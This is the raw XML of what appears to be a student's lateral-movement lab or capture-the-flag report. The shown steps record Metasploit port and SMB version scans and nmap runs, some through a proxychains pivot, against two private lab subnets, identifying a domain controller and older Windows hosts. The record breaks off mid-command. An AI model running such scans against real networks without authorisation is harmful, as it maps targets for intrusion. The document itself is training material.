    <w:p w14:paraId="13442879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10.10.93.101:445 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D159E9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Scanned 104 of 256 hosts (40% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52732313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Scanned 128 of 256 hosts (50% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26156B2B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Scanned 154 of 256 hosts (60% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBD0D3E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Scanned 181 of 256 hosts (70% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B1B4FA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Scanned 205 of 256 hosts (80% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D78B02B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Scanned 231 of 256 hosts (90% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0B10D4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Scanned 256 of 256 hosts (100% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55915920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Auxiliary module execution completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4414FEBC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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidRPr="00435920">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> auxiliary(</w:t>
      </w:r>
      <w:r w:rsidRPr="00435920">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B42419"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="00435920">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; set RHOSTS 10.10.94.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747D5187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RHOSTS =&gt; 10.10.94.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ADA314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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidRPr="00435920">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> auxiliary(</w:t>
      </w:r>
      <w:r w:rsidRPr="00435920">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B42419"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="00435920">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E55F3A2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52705EA0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10.10.94.1:139 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEAF29F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10.10.94.5:139 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6A9714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10.10.94.5:25 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7732A185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10.10.94.5:80 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6B618D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10.10.94.5:445 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8A5056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10.10.94.20:445 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B38E5A8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10.10.94.20:139 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CF45F5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10.10.94.1:445 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABB9F60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Scanned  37 of 256 hosts (14% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADDD168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Scanned  62 of 256 hosts (24% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB77114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10.10.94.99:80 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A79CE21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10.10.94.99:25 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE594DD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10.10.94.99:139 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8CCA10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10.10.94.99:445 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03309152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Scanned  82 of 256 hosts (32% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7943B188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10.10.94.101:445 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FE97D5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10.10.94.101:139 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2613A6AA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10.10.94.101:80 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AED8AE4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Scanned 104 of 256 hosts (40% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F64370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Scanned 128 of 256 hosts (50% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33860E22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Scanned 155 of 256 hosts (60% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D8FE27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Scanned 180 of 256 hosts (70% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779AE2CD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Scanned 209 of 256 hosts (81% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFBBB00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Scanned 235 of 256 hosts (91% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5341B176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10.10.94.252:445 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A41DA21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10.10.94.252:80 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B59EACB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10.10.94.252:139 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73916089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Scanned 256 of 256 hosts (100% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B314C1A" w14:textId="77777777" w:rsid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435920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435920">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Auxiliary module execution completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564C61B3" w14:textId="77777777" w:rsidR="00435920" w:rsidRDefault="00435920"/>
    <w:p w14:paraId="72AE23AF" w14:textId="77777777" w:rsidR="00DE189E" w:rsidRDefault="00DE189E"/>
    <w:p w14:paraId="1D9BD50F" w14:textId="2B46114A" w:rsidR="00DE189E" w:rsidRDefault="0015687E">
      <w:r>
        <w:t>Step 10</w:t>
      </w:r>
      <w:r w:rsidR="00DE189E">
        <w:t xml:space="preserve">. Ran nmap scan with and without proxychains </w:t>
      </w:r>
      <w:r w:rsidR="0021780C">
        <w:t xml:space="preserve"> on the selected systems </w:t>
      </w:r>
      <w:r w:rsidR="00DE189E">
        <w:t>to check vulnerable systems in 10.10.93.0/24</w:t>
      </w:r>
      <w:r w:rsidR="00435920">
        <w:t xml:space="preserve"> and 10.10.94.0/24</w:t>
      </w:r>
      <w:r w:rsidR="00DE189E">
        <w:t xml:space="preserve"> network. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017EA4CA" w14:textId="418DEB02" w:rsidR="00FC5E2F" w:rsidRDefault="00FC5E2F" w:rsidP="00FC5E2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Nmap –F ipaddress</w:t>
      </w:r>
      <w:r w:rsidR="00435920">
        <w:t>(worked only in 10.10.93.0/24 network)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00443325">
        <w:t>(got open ports in 10.10.93.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7F1FA2" w14:textId="77777777" w:rsidR="00435920" w:rsidRDefault="00435920" w:rsidP="00435920"/>
    <w:p w14:paraId="69222C88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Nmap scan report for 10.10.93.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F135D3B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Host is up (0.00018s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EC9BFF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Not shown: 98 filtered ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042926E9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PORT     STATE  SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C65EA2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6000/tcp closed X11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F70C129" w14:textId="0A294A37" w:rsidR="00435920" w:rsidRPr="00435920" w:rsidRDefault="00435920" w:rsidP="00435920">
      <w:pPr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6001/tcp closed X11:1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D10DFE4" w14:textId="77777777" w:rsidR="00435920" w:rsidRPr="00435920" w:rsidRDefault="00435920" w:rsidP="00435920">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6620B2BB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Nmap scan report for 10.10.93.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F759BE9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Host is up (0.00066s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEAE34E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Not shown: 88 closed ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271F00E1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PORT      STATE    SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B716D89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13/tcp    filtered daytime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79840AA4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106/tcp   filtered pop3pw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599928BE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135/tcp   open     msrpc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BCE1E7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139/tcp   open     netbios-ssn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603355CC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445/tcp   open     microsoft-ds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6F6F1E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548/tcp   filtered afp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A069CFA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873/tcp   filtered rsync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC0FCCE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5060/tcp  filtered sip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AF70CE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8008/tcp  filtered http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D878658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49152/tcp open     unknown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3339D34F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49153/tcp open     unknown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6C4268" w14:textId="77777777" w:rsidR="00435920" w:rsidRPr="00435920" w:rsidRDefault="00435920" w:rsidP="004359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435920">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>49154/tcp open     unknown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6A2BB5" w14:textId="77777777" w:rsidR="00435920" w:rsidRDefault="00435920" w:rsidP="00435920"/>
    <w:p w14:paraId="45388E2E" w14:textId="77777777" w:rsidR="00435920" w:rsidRDefault="00435920" w:rsidP="00435920"/>
    <w:p w14:paraId="708DCFBB" w14:textId="7360810A" w:rsidR="00FC5E2F" w:rsidRPr="00FC5E2F" w:rsidRDefault="00FC5E2F" w:rsidP="00FC5E2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">proxychains </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5E2F">
        <w:t>nmap -sT -sV -Pn --version-all -p 80,139,445</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ipaddress </w:t>
      </w:r>
      <w:r w:rsidR="00435920">
        <w:t xml:space="preserve">(worked in both 10.10.93.0/24 and 10.10.94.0/24 network) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">( I added the open ports that I was able to discover </w:t>
      </w:r>
      <w:r w:rsidR="00443325">
        <w:t>using normal nmap. This gave open ports in 10.10.93.1 which were filtered for normal nmap)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042DB00B" w14:textId="4FB85424" w:rsidR="00FC5E2F" w:rsidRDefault="00FC5E2F" w:rsidP="00435920"/>
    <w:p w14:paraId="703C7F46" w14:textId="77777777" w:rsidR="00435920" w:rsidRDefault="00435920" w:rsidP="00435920"/>
    <w:p w14:paraId="6DE3E172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Nmap scan report for 10.10.93.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4CCE1F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Host is up (4.7s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8C50E7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PORT     STATE  SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A46F22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135/tcp  open   msrpc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A485AD7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139/tcp  open   netbios-ssn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B497D3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445/tcp  open   microsoft-ds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787ACFB4" w14:textId="77777777" w:rsidR="00435920" w:rsidRPr="0015687E" w:rsidRDefault="00435920" w:rsidP="00435920">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18F61B8B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Nmap scan report for 10.10.93.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348B5852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Host is up (3.8s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C81DCD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PORT     STATE  SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5467EFDA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135/tcp  open   msrpc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CB3F9A" w14:textId="0BB1DA8A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445/tcp  open   microsoft-ds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D60D272" w14:textId="77777777" w:rsidR="0015687E" w:rsidRPr="0015687E" w:rsidRDefault="0015687E" w:rsidP="00435920">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="033175FD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Nmap scan report for 10.10.93.254</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8824AF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Host is up (3.6s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F402C6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PORT     STATE  SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AADF9A" w14:textId="2DFEB10B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22/tcp   open   ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A50F906" w14:textId="77777777" w:rsid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179/tcp  open   bgp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDAB130" w14:textId="77777777" w:rsid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46CC4F23" w14:textId="77777777" w:rsid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0506457C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Nmap scan report for 10.10.94.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA44DD5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Host is up (11s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264ACF87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PORT     STATE  SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267E7F65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135/tcp  open   msrpc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEA193C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139/tcp  open   netbios-ssn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4BF7D6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445/tcp  open   microsoft-ds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545C6535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67389CDF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Nmap scan report for 10.10.94.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E70815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Host is up (3.9s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172DC4C7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PORT     STATE  SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317B0842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80/tcp   open   http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7512E1BB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135/tcp  open   msrpc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706AAF21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139/tcp  open   netbios-ssn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6529A0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445/tcp  open   microsoft-ds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694FA61F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769CA64E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Nmap scan report for 10.10.94.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A4F864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Host is up (3.3s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDA107C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PORT     STATE  SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438103D6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135/tcp  open   msrpc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477CEEA6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139/tcp  open   netbios-ssn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E48DF3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445/tcp  open   microsoft-ds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA9EF32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4FB15C8E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Nmap scan report for 10.10.94.99</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62389A16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Host is up (4.6s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307C2A6A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PORT     STATE  SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FD18FF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22/tcp   open   ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB4CD0D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23/tcp   open   telnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2B1A1A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80/tcp   open   http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2E218C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139/tcp  open   netbios-ssn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4A25FD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445/tcp  open   microsoft-ds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4A34BE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6F57149A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14FFF49F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Nmap scan report for 10.10.94.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5835A7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Host is up (11s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650F22DB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PORT     STATE  SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B91C79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80/tcp   open   http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8670B8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135/tcp  open   msrpc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299F33B0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139/tcp  open   netbios-ssn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF70174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445/tcp  open   microsoft-ds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64388FDF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6FA4C2A5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Nmap scan report for 10.10.94.252</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECC31AC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Host is up (4.1s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9A6589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PORT     STATE  SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EC7615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80/tcp   open   http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6C154A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135/tcp  open   msrpc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26798237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139/tcp  open   netbios-ssn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD03CEF" w14:textId="2B2D80C5" w:rsid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15687E">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>445/tcp  open   microsoft-ds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D23DAA4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7E495AD1" w14:textId="77777777" w:rsidR="00DE189E" w:rsidRDefault="00DE189E"/>
    <w:p w14:paraId="33877B74" w14:textId="41E25927" w:rsidR="0015687E" w:rsidRDefault="0015687E">
      <w:r>
        <w:t>Step 11. To get a better understanding of the systems on network I did a smb_version scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FA7EE1" w14:textId="77777777" w:rsidR="0015687E" w:rsidRDefault="0015687E"/>
    <w:p w14:paraId="3B172A2D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socks4a</w:t>
      </w:r>
      <w:r w:rsidRPr="0015687E">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; use scanner/smb/smb_version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B9C4C3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15687E">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; set RHOSTS 10.10.93.1,10.10.93.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBE1A19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RHOSTS =&gt; 10.10.93.1,10.10.93.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FBFFD6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15687E">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C927B8C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[-]</w:t>
      </w:r>
      <w:r w:rsidRPr="0015687E">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Auxiliary failed: Msf::OptionValidateError The following options failed to validate: RHOSTS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9A9CA7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15687E">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; set RHOSTS 10.10.93.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387870A2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RHOSTS =&gt; 10.10.93.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F85D901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15687E">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE2F99E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3A8EFEC9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Module options (auxiliary/scanner/smb/smb_version):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD13D70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682EB20C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 xml:space="preserve">   Name       Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627177AF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 xml:space="preserve">   ----       ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3609620C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 xml:space="preserve">   RHOSTS     10.10.93.1       yes       The target address range or CIDR identifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2103284C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 xml:space="preserve">   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112DBF75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 xml:space="preserve">   SMBPass                     no        The password for the specified username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2316A8CC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 xml:space="preserve">   SMBUser                     no        The username to authenticate as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375663EA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 xml:space="preserve">   THREADS    1                yes       The number of concurrent threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0843DEA1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2EC07911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15687E">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F14BF5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4BFBB41E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10.10.93.1:445 is running Windows 2008 R2 Standard (build:7600) (name:LATERALCTF-DC) (domain:WIDGET-CORP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1239D2FF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Scanned 1 of 1 hosts (100% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6029EC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Auxiliary module execution completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37351FCC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15687E">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; set RHOSTS 10.10.93.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C119F84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RHOSTS =&gt; 10.10.93.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B214C98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15687E">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67841B30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5213F493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10.10.93.15:445 is running Windows 7 Professional (build:7600) (name:WIDGETEER) (domain:WIDGET-CORP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629A9A12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Scanned 1 of 1 hosts (100% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6015893E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Auxiliary module execution completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353EEE29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15687E">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; set RHOSTS 10.10.93.254</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A435E2E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RHOSTS =&gt; 10.10.93.254</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1580E8E6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15687E">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D737F66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22EB163E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Scanned 1 of 1 hosts (100% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC1061E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Auxiliary module execution completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B146C37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15687E">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; set RHOSTS 10.10.94.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7988401C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RHOSTS =&gt; 10.10.94.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1072F8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15687E">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41179D96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42056952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10.10.94.1:445 is running Windows 2008 R2 Standard (build:7600) (name:LATERALCTF-DC) (domain:WIDGET-CORP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A642DB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Scanned 1 of 1 hosts (100% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595FC41E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Auxiliary module execution completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F396B4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15687E">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; set RHOSTS 10.10.94.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E94F22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RHOSTS =&gt; 10.10.94.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318D99BA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15687E">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204F4E43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1D7A2414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10.10.94.5:445 is running Windows 2003 SP1 (build:3790) (name:VICTIM-SMTP) (domain:WIDGET-CORP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C6CE88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Scanned 1 of 1 hosts (100% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EE2B3E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Auxiliary module execution completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FDE2D5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15687E">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) &gt; set RHOSTS 10.10.94.20</w:t>
